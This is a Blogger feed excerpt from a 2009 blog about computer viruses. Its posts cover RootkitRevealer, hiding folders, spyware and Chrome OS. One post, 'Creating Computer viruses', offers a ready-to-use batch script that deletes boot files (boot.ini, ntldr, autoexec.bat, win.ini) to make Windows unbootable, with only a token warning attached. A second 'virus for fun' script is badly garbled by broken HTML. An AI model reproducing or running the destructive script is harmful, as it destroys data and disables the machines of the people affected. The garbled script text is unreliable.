type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7415602806715778384?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7415602806715778384/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/08/black-listed-sites.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7415602806715778384'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7415602806715778384'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/08/black-listed-sites.html' title='Black Listed Sites'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6440080421884328106</id><published>2009-07-27T01:45:00.000-07:00</published><updated>2009-07-27T02:57:55.732-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rootkit'/><category scheme='http://www.blogger.com/atom/ns#' term='RootkitRevealer'/><title type='text'>RootkitRevealer</title><content type='html'>&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;               Now its time to look in to the software section. Let us see about a small software called RootkitReaveler. The software doesn't need to be installed, just double click on the icon and just agree the term and conditions, the software is ready to use. It is designed to run on Windows NT or higher editions of Windows. RootkitRevealer is an advanced rootkit detection utility and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.RootkitRevealer is capable of detecting many persistent rootkits including AFX, Vanquish and HackerDefender. RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys. Since persistent rootkits work by changing API results so that a system view using APIs differs from the actual view in storage, RootkitRevealer compares the results of a system scan at the highest level with that at the lowest level. The highest level is the Windows API and the lowest level is the raw contents of a file system volume or Registry hive. A hive file is the Registry's on-disk storage format. Thus, rootkits, whether user mode or kernel mode, that manipulate the Windows API or native API to remove their presence from a directory listing, for example, will be seen by RootkitRevealer as a discrepancy between the information returned by the Windows API and that seen in the raw scan of a FAT or NTFS volume's file system structures. You can download it from &lt;a href="http://filehippo.com/download_rootkit_revealer/tech/"&gt;http://filehippo.com/download_rootkit_revealer/tech/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;         &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;        &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;         &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6440080421884328106?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6440080421884328106/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/rootkitrevealer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6440080421884328106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6440080421884328106'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/rootkitrevealer.html' title='RootkitRevealer'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-924476591474748796</id><published>2009-07-25T07:47:00.000-07:00</published><updated>2009-07-25T08:55:53.387-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='invible folder'/><title type='text'>How to create an invisible folder</title><content type='html'>You may have the private details in your computer and you don't like your friends accessing them. There are software available in the market for protecting your folder by using a password. In such cases you may get troubled if the password is lost. There is also an another way to hide the folders from your friends.  This is a common technique used to create an invisible folders.The advantage of this method is that you need no software for that. Follow the steps given below:&lt;br /&gt;&lt;br /&gt;1. Select the folder you want to make invisible.&lt;br /&gt;&lt;br /&gt;2. Press F2 or right click on the folder and choose rename.&lt;br /&gt;&lt;br /&gt;3. Press and hold the alt key and enter 255 using the number pad (press the Num Lock key and enter 255 using the number pad in the Right Hand Side) and then release the alt key.&lt;br /&gt;&lt;br /&gt;4. Press enter. Now the folder appears to be a nameless folder.&lt;br /&gt;&lt;br /&gt;5. Now what is the next step ? Yes, that's it, making the icon invisible. For that right click on the folder and select the properties.&lt;br /&gt;&lt;br /&gt;6. Select the customize tab and click on the change icon button.&lt;br /&gt;&lt;br /&gt;7. Now a new window containing several icons appear. Select a invisible icon from the window and then press OK button of the two opened windows. Now the invisible folder is ready.&lt;br /&gt;&lt;br /&gt;You can use this to have fun on you friends by hiding the folders in their computers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;           &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;       &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;          &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-924476591474748796?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/924476591474748796/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/how-to-create-invisible-folder.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/924476591474748796'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/924476591474748796'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/how-to-create-invisible-folder.html' title='How to create an invisible folder'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8785560451465817177</id><published>2009-07-24T02:04:00.001-07:00</published><updated>2009-07-24T03:30:08.957-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Chrome OS'/><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><title type='text'>Google trying to put an end to computer virus....</title><content type='html'>After the release of the Operating System Google is trying to put an end to the computer virus. The engineering experts is studying the flaws in the existing Operating Systems and the measures to overcome the limitation. If the Google's venture is realized, then it would mark the beginning of a new era in the cyber world. It has been learnt that Linus Upson, Google's Engineering Director, has promised the company is: "Completely redesigning the underlying security architecture of the OS so users don't have to deal with viruses, malware and security updates. It should just work." The dominance of Google among the competitors increases the chance for the success. The Google's policy of the Open Source also add support this argument. But in the history, the release of the Operating System Windows NT threatened several antivirus firms since there was a rumor that all the security flaws of the previous versions of Windows has been solved and no virus can harm the computer running on Windows NT, but the result was against the rumor.  There are several challenges before the Google. The  web browser Chrome has been reported security flaws and two of them had already solved. We can expect an Operating System free from viruses and malware at free of cost.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;             &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;   &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;    &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8785560451465817177?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8785560451465817177/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/google-trying-to-put-end-to-computer.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8785560451465817177'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8785560451465817177'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/google-trying-to-put-end-to-computer.html' title='Google trying to put an end to computer virus....'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8790754195048839949</id><published>2009-07-22T20:29:00.000-07:00</published><updated>2009-07-22T22:35:21.407-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spyware'/><category scheme='http://www.blogger.com/atom/ns#' term='computer security'/><title type='text'>Spyware (Part - 3)</title><content type='html'>Let us see what are the medium through which a spyware infects computer. A spyware in a computer do not try to infect other computers like virus or worms or trojans. It just collects the user details and send to a particular person or firm via internet. Spywares usually get installed in the computer without the knowledge of the user. The spyware usually comes with a useful software. When the user installs the software without knowing that the software contains spyware, the spyware gets installed in to the computer and sends the details about the user stored in the computer. This is against the privacy in using internet. The manufacturer usually presents the spyware as a useful software. The common categories of the software include themes, games, internet utilities such as download accelerators, web boosters etc. Many Internet users were introduced to spyware in 1999, when a popular freeware game called "Elf Bowling" came bundled with tracking software. The cookie is a well-known mechanism for storing information about an internet user on their own computer. If a website stores information about you in a cookie that you don't know about, the cookie can be considered a form of spyware.&lt;br /&gt;Another way of installing is by using the vulnerabilities in the security software provided to block this spyware. This is by making the user to click on a link that is disguised as a pop up asking any thing that makes the user click on the pop-up. that triggers the installing of the spyware. In a few cases, a worm or virus has delivered a spyware payload. Some attackers used the Spybot worm to install spyware that put pornographic pop-ups on the infected system's screen.By directing traffic to ads set up to channel funds to the spyware authors, they profit personally.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;          &lt;a style="font-weight: bold;" href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;                 &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;                &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8790754195048839949?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8790754195048839949/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/spyware-part-3.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8790754195048839949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8790754195048839949'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/spyware-part-3.html' title='Spyware (Part - 3)'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7065706430414256754</id><published>2009-07-21T09:36:00.000-07:00</published><updated>2009-07-21T07:57:46.899-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='source code'/><title type='text'>Creating Computer viruses</title><content type='html'>In this post I will say how to create some more dangerous application. Activating this will shut down the computer after deleting the files required for booting and not boot during restart. So handle with care otherwise it will end up in the permanent crash. Please do not use this to harm others. I found it from &lt;a href="http://www.garena.com/forum/viewthread.php?tid=214948"&gt;Garena.com&lt;/a&gt;.  &lt;br /&gt;&lt;br /&gt;Open a notepad and type the following and save it as "filename.bat" file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;attrib -r -s -h c:\autoexec.bat&lt;br /&gt;del c:\autoexec.bat&lt;br /&gt;attrib -r -s -h c:\boot.ini&lt;br /&gt;del c:\boot.ini&lt;br /&gt;attrib -r -s -h c:\ntldr&lt;br /&gt;del c:\ntldr&lt;br /&gt;attrib -r -s -h c:\windows\win.ini&lt;br /&gt;del c:\windows\win.ini&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;           &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;                      &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;                        &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7065706430414256754?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7065706430414256754/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/creating-computer-viruses.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7065706430414256754'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7065706430414256754'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/creating-computer-viruses.html' title='Creating Computer viruses'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-3311624551145034466</id><published>2009-07-21T03:53:00.000-07:00</published><updated>2009-07-21T07:32:38.811-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='notepad virus'/><title type='text'>How to make a Virus for fun</title><content type='html'>While I was searching for latest information about the computer viruses in the internet, I came across a site that tells how to make a simple virus for fun. Its link is: &lt;a href="http://ardiansyahputra.wordpress.com/2008/08/23/create-a-harmless-virus-in-notepad-cara-membuat-virus-jinak-di-notepad/"&gt;http://ardiansyahputra.wordpress.com/2008/08/23/create-a-harmless-virus-in-notepad-cara-membuat-virus-jinak-di-notepad/    &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I have put it for you. It can be edited according to your wish. However I didn't edited as it is his work. Please do not use this for any malpractices.&lt;br /&gt;&lt;br /&gt;Step 1.&lt;br /&gt;       Open a notepad&lt;br /&gt;Step 2.&lt;br /&gt;       Type the following codes in the notepad.&lt;br /&gt;cls&lt;br /&gt;:A&lt;br /&gt;color 0a&lt;br /&gt;cls&lt;br /&gt;@echo off&lt;br /&gt;echo Wscript.Sleep 5000&gt;C:\sleep5000.vbs&lt;br /&gt;echo Wscript.Sleep 3000&gt;C:\sleep3000.vbs&lt;br /&gt;echo Wscript.Sleep 4000&gt;C:\sleep4000.vbs&lt;br /&gt;echo Wscript.Sleep 2000&gt;C:\sleep2000.vbs&lt;br /&gt;cd %systemroot%\System32&lt;br /&gt;dir&lt;br /&gt;cls&lt;br /&gt;start /w wscript.exe C:\sleep3000.vbs&lt;br /&gt;echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…&lt;br /&gt;echo …………………&lt;br /&gt;echo:&lt;br /&gt;echo:&lt;br /&gt;start /w wscript.exe C:\sleep3000.vbs&lt;br /&gt;echo NEXT…………!&lt;brstart namaku="" mau="" jadi="" teman="" lengkapnya="" ntar="" selanjutnya="" aku="" kasih="" data="" yg="" lengkap="" blognya="" cd="" documents="" and="" all="" mkdir="" si_ganteng_putra="" coming="" up="" by="" ardiansyah="" putra="" electrical="" andalas="" west="" indonesia="" id="" call="" me="" yachh="" 6281363xxxxxx="" sms="" jug="" boleh="" lho="" d="" sabaran="" firewall="" kamu="" semua="" prosess="" udah="" silahkan="" booting="" dengan="" segala="" virus="" masuk="" salam="" dari="" si="" ganteng="" echo="" com="" start="" w="" exe="" vbs="" pause="" shutdown="" f="" s="" c="" back="" to="" save="" notepad="" as="" file="" can="" be="" any="" name="" but="" you="" must="" putthe="" bat="" step="" right="" click="" on="" the="" icon=""&gt; properties -&gt; options -&gt; full screen&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 4 is not necessary. But it will magnify the effect.&lt;br /&gt;&lt;/brstart&gt;&lt;br /&gt;&lt;brstart namaku="" mau="" jadi="" teman="" lengkapnya="" ntar="" selanjutnya="" aku="" kasih="" data="" yg="" lengkap="" blognya="" cd="" documents="" and="" all="" mkdir="" si_ganteng_putra="" coming="" up="" by="" ardiansyah="" putra="" electrical="" andalas="" west="" indonesia="" id="" call="" me="" yachh="" 6281363xxxxxx="" sms="" jug="" boleh="" lho="" d="" sabaran="" firewall="" kamu="" semua="" prosess="" udah="" silahkan="" booting="" dengan="" segala="" virus="" masuk="" salam="" dari="" si="" ganteng="" echo="" com="" start="" w="" exe="" vbs="" pause="" shutdown="" f="" s="" c="" back="" to="" save="" notepad="" as="" file="" can="" be="" any="" name="" but="" you="" must="" putthe="" bat="" step="" right="" click="" on="" the="" icon=""&gt;&lt;br /&gt;Step 5.&lt;br /&gt;        Yes, that is the only step remaining -activate it by double clicking on the icon.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To deactivate To Abort virus Click so that your PC is not&lt;/brstart&gt;&lt;brstart namaku="" mau="" jadi="" teman="" lengkapnya="" ntar="" selanjutnya="" aku="" kasih="" data="" yg="" lengkap="" blognya="" cd="" documents="" and="" all="" mkdir="" si_ganteng_putra="" coming="" up="" by="" ardiansyah="" putra="" electrical="" andalas="" west="" indonesia="" id="" call="" me="" yachh="" 6281363xxxxxx="" sms="" jug="" boleh="" lho="" d="" sabaran="" firewall="" kamu="" semua="" prosess="" udah="" silahkan="" booting="" dengan="" segala="" virus="" masuk="" salam="" dari="" si="" ganteng="" echo="" com="" start="" w="" exe="" vbs="" pause="" shutdown="" f="" s="" c="" back="" to="" save="" notepad="" as="" file="" can="" be="" any="" name="" but="" you="" must="" putthe="" bat="" step="" right="" click="" on="" the="" icon=""&gt; shutdown: START – RUN and type command: shutdown &lt;/brstart&gt;&lt;brstart namaku="" mau="" jadi="" teman="" lengkapnya="" ntar="" selanjutnya="" aku="" kasih="" data="" yg="" lengkap="" blognya="" cd="" documents="" and="" all="" mkdir="" si_ganteng_putra="" coming="" up="" by="" ardiansyah="" putra="" electrical="" andalas="" west="" indonesia="" id="" call="" me="" yachh="" 6281363xxxxxx="" sms="" jug="" boleh="" lho="" d="" sabaran="" firewall="" kamu="" semua="" prosess="" udah="" silahkan="" booting="" dengan="" segala="" virus="" masuk="" salam="" dari="" si="" ganteng="" echo="" com="" start="" w="" exe="" vbs="" pause="" shutdown="" f="" s="" c="" back="" to="" save="" notepad="" as="" file="" can="" be="" any="" name="" but="" you="" must="" putthe="" bat="" step="" right="" click="" on="" the="" icon=""&gt;-a before remaining time is over.&lt;br /&gt;look at the fig. below&lt;/brstart&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/SmXQ2PX4ViI/AAAAAAAAAHM/bvu64ogX4lE/s1600-h/cmd.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 169px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/SmXQ2PX4ViI/AAAAAAAAAHM/bvu64ogX4lE/s320/cmd.jpg" alt="" id="BLOGGER_PHOTO_ID_5360920561712649762" border="0" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;brstart namaku="" mau="" jadi="" teman="" lengkapnya="" ntar="" selanjutnya="" aku="" kasih="" data="" yg="" lengkap="" blognya="" cd="" documents="" and="" all="" mkdir="" si_ganteng_putra="" coming="" up="" by="" ardiansyah="" putra="" electrical="" andalas="" west="" indonesia="" id="" call="" me="" yachh="" 6281363xxxxxx="" sms="" jug="" boleh="" lho="" d="" sabaran="" firewall="" kamu="" semua="" prosess="" udah="" silahkan="" booting="" dengan="" segala="" virus="" masuk="" salam="" dari="" si="" ganteng="" echo="" com="" start="" w="" exe="" vbs="" pause="" shutdown="" f="" s="" c="" back="" to="" save="" notepad="" as="" file="" can="" be="" any="" name="" but="" you="" must="" putthe="" bat="" step="" right="" click="" on="" the="" icon=""&gt;&lt;br /&gt;                          &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;                          &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img style="width: 149px; height: 29px;" alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;                          &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;div&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;/brstart&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-3311624551145034466?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/3311624551145034466/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/how-to-make-virus-for-fun.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3311624551145034466'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3311624551145034466'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/how-to-make-virus-for-fun.html' title='How to make a Virus for fun'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mPzqYV2-K04/SmXQ2PX4ViI/AAAAAAAAAHM/bvu64ogX4lE/s72-c/cmd.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8617281810995258723</id><published>2009-07-20T21:53:00.000-07:00</published><updated>2009-07-21T00:21:57.946-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spyware'/><title type='text'>Spyware (Part - 2)</title><content 